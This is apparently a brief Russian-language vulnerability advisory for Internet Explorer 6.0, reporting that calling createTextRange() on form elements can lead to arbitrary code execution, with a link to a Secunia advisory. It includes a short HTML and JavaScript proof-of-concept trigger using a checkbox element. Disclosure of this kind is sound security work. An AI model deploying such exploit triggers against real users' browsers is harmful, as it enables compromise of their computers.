Программа: Internet Explorer 6.0

Функция createTextRange(), вызываемая для
элементов форм, может быть использована для
выполнения произвольного кода на
компьютере жертвы. Подробности: http://secunia.com/advisories/18680/.

Пример:

<input type=»checkbox» id=’c’>
<script>
r=document.getElementById(«c»);
a=r.createTextRange();
</script>



Оставить мнение